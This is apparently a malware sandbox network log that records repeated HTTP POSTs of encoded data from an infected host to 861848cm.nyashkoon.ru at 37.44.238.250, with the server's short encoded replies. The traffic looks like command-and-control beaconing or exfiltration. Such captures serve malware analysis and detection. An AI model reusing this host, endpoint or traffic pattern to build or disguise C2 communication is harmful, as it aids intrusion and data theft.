                                                                                            128192.168.2.45013537.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:26.226726055 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:54:26.571060896 CET1024OUTData Raw: 56 56 5a 5d 53 5c 55 5a 5a 5f 52 51 54 5c 5b 5f 55 53 59 58 51 5f 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VVZ]S\UZZ_RQT\[_USYXQ_RZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%-<.V<(((**6*)$$^#/>W?>3-%07&)'X$.Q->
                                                                                            Nov 5, 2024 23:54:27.042350054 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:27.114298105 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:25 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            129192.168.2.45013637.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:27.248897076 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:27.605964899 CET1024OUTData Raw: 56 5f 5a 5a 53 5d 50 5a 5a 5f 52 51 54 5f 5b 5b 55 51 59 59 51 55 52 5b 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V_ZZS]PZZ_RQT_[[UQYYQUR[TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,5?8Y?')*2)6]'^8X7+.\-/4$92)'X$.Q-2
                                                                                            Nov 5, 2024 23:54:28.055320024 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:28.130038023 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:26 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            130192.168.2.45013737.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:28.270579100 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:28.617945910 CET1024OUTData Raw: 56 5e 5a 59 56 5b 50 59 5a 5f 52 51 54 5d 5b 5e 55 56 59 58 51 50 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V^ZYV[PYZ_RQT][^UVYXQPRXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,?5((+7=)1=&Z$#4<=(>'Y. .%'X$.Q-
                                                                                            Nov 5, 2024 23:54:29.085493088 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:29.158462048 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:27 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            131192.168.2.45013837.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:29.291663885 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:29.652070045 CET1024OUTData Raw: 56 55 5a 5d 56 56 55 5a 5a 5f 52 51 54 53 5b 5a 55 50 59 5c 51 52 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VUZ]VVUZZ_RQTS[ZUPY\QRRSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,<>+4_+0;(:!=!38 7,&)./\9/7-1'X$.Q-
                                                                                            Nov 5, 2024 23:54:30.102713108 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:30.179821968 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:28 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            132192.168.2.45013937.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:30.315850019 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:30.664855003 CET1016OUTData Raw: 56 54 5f 5f 53 5c 50 5b 5a 5f 52 51 54 5a 5b 52 55 51 59 5e 51 56 52 59 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VT__S\P[Z_RQTZ[RUQY^QVRYTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&8,2<>3(Z=*=Z3#4.Q?>[9544!29'X$.Q-


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            133192.168.2.45014037.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:30.968440056 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:31.324032068 CET1284OUTData Raw: 56 5e 5a 5d 56 58 50 53 5a 5f 52 51 54 5b 5b 59 55 57 59 5c 51 57 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V^Z]VXPSZ_RQT[[YUWY\QWRSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,<>? _<):)*)$^(Y4?W+=/]-374!')'X$.Q-"
                                                                                            Nov 5, 2024 23:54:31.789808035 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:31.863925934 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:29 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 23 07 2b 14 36 13 24 02 34 54 2a 3e 0f 5e 28 33 23 5c 2f 0c 0d 01 3e 1d 3b 04 2b 2b 33 09 20 01 24 00 22 0c 0f 5a 20 32 01 10 28 11 21 5f 05 1d 3a 06 27 17 01 0d 3d 1c 00 1b 2a 09 20 0a 31 33 24 40 3e 02 35 04 23 29 22 1f 31 3e 0b 59 32 31 2b 1b 3c 24 2d 15 3a 11 30 09 25 3a 2a 57 09 16 20 1d 33 55 33 5e 3d 32 23 59 27 58 3e 01 26 5c 38 0b 3d 02 23 5a 20 1a 36 15 29 33 2f 5f 35 0e 39 03 24 3a 25 1d 32 07 2b 1b 2b 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: #+6$4T*>^(3#\/>;++3 $"Z 2(!_:'=* 13$@>5#)"1>Y21+<$-:0%:*W 3U3^=2#Y'X>&\8=#Z 6)3/_59$:%2++"&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            134192.168.2.45014137.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:31.091594934 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:31.446080923 CET1024OUTData Raw: 56 51 5f 59 53 5a 50 53 5a 5f 52 51 54 5e 5b 5d 55 5d 59 5c 51 5e 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VQ_YSZPSZ_RQT^[]U]Y\Q^R^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%-/.<(\(0;>)6_'(/ <=(<-%0]!'9%)'X$.Q-6
                                                                                            Nov 5, 2024 23:54:31.893173933 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:31.973112106 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:29 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            135192.168.2.45014237.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:32.127007961 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:54:32.477303028 CET1024OUTData Raw: 56 51 5a 58 53 58 55 5e 5a 5f 52 51 54 5c 5b 53 55 55 59 5f 51 5f 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VQZXSXU^Z_RQT\[SUUY_Q_RXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&8?.T=;8^>37>9!=[*^%(#7?. \!7-19'X$.Q->
                                                                                            Nov 5, 2024 23:54:32.930119991 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:33.003645897 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:30 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            136192.168.2.45014337.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:33.138135910 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:33.493968010 CET1024OUTData Raw: 56 53 5a 58 56 59 55 5e 5a 5f 52 51 54 5f 5b 59 55 5d 59 5f 51 52 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VSZXVYU^Z_RQT_[YU]Y_QRRXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%_;?2V<(;?38Y*:.)38$Z /&+.?],%##7!')'X$.Q-2
                                                                                            Nov 5, 2024 23:54:33.941673994 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:34.020648003 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:31 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP
                                                                                            Nov 5, 2024 23:54:34.276355982 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:31 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP
                                                                                            Nov 5, 2024 23:54:34.277240038 CET25INHTTP/1.1 100 Continue


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            137192.168.2.45014437.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:34.277518034 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:34.633698940 CET1016OUTData Raw: 56 54 5f 59 53 5c 50 58 5a 5f 52 51 54 5a 5b 59 55 57 59 58 51 53 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VT_YS\PXZ_RQTZ[YUWYXQSR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/,)=(#? \>\*?.5%(#T(./:34'%'X$.Q-*
                                                                                            Nov 5, 2024 23:54:35.082019091 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:35.158123970 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:33 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            138192.168.2.45014537.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:35.276504993 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:35.633548975 CET1016OUTData Raw: 56 56 5a 5c 56 5b 55 5e 5a 5f 52 51 54 5a 5b 59 55 54 59 59 51 53 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VVZ\V[U^Z_RQTZ[YUTYYQSRXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%^/-?;7>#?=-*>!$ 7/:(:<#-%'X$.Q-*
                                                                                            Nov 5, 2024 23:54:36.087872982 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:36.162278891 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:34 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            139192.168.2.45014637.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:36.298546076 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:36.649178028 CET1024OUTData Raw: 53 56 5f 5f 53 58 55 59 5a 5f 52 51 54 58 5b 53 55 56 59 5f 51 54 52 5b 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SV__SXUYZ_RQTX[SUVY_QTR[TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&8/=+;'+ ;)Z==)';#4!(>,5;7.]2'X$.Q-.


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            140192.168.2.45014737.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:36.878124952 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:37.229960918 CET1284OUTData Raw: 53 53 5f 5e 56 59 55 5e 5a 5f 52 51 54 5f 5b 5c 55 56 59 58 51 54 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SS_^VYU^Z_RQT_[\UVYXQTR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%X;&=; Y(7(:")=' Z7+'\9% \4:_2'X$.Q-2
                                                                                            Nov 5, 2024 23:54:37.697130919 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:37.771986961 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:35 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 5e 2a 2a 21 03 27 3b 0d 08 2a 3e 03 5e 3f 0e 20 04 2d 22 09 02 28 20 2c 59 3e 06 0e 19 23 06 20 00 22 32 35 10 23 31 2c 02 28 3b 21 5f 05 1d 3a 03 33 2a 2b 0c 2b 31 32 5e 29 34 2f 1e 25 1e 34 42 2a 28 35 05 20 29 2a 11 31 2e 29 1f 25 1c 0d 55 2a 24 25 5a 2c 3f 09 1c 32 3a 2a 57 09 16 20 56 27 0d 33 5e 3e 08 3b 1d 30 2e 1b 12 31 04 27 54 3e 2c 23 5b 20 34 3e 17 2a 30 27 13 21 34 22 5a 27 29 3a 41 31 00 0d 50 2b 18 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: ^**!';*>^? -"( ,Y># "25#1,(;!_:3*++12^)4/%4B*(5 )*1.)%U*$%Z,?2:*W V'3^>;0.1'T>,#[ 4>*0'!4"Z'):A1P+&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            141192.168.2.45014837.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:37.026089907 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:37.383560896 CET1024OUTData Raw: 56 51 5a 5a 56 57 55 58 5a 5f 52 51 54 5b 5b 5e 55 55 59 5a 51 5e 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VQZZVWUXZ_RQT[[^UUYZQ^RXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,"T+ (#(:)=)$8Y7-+>+Y,%<] Q2%'X$.Q-"
                                                                                            Nov 5, 2024 23:54:37.837976933 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:37.911415100 CET158INHTTP/1.1 200 OK
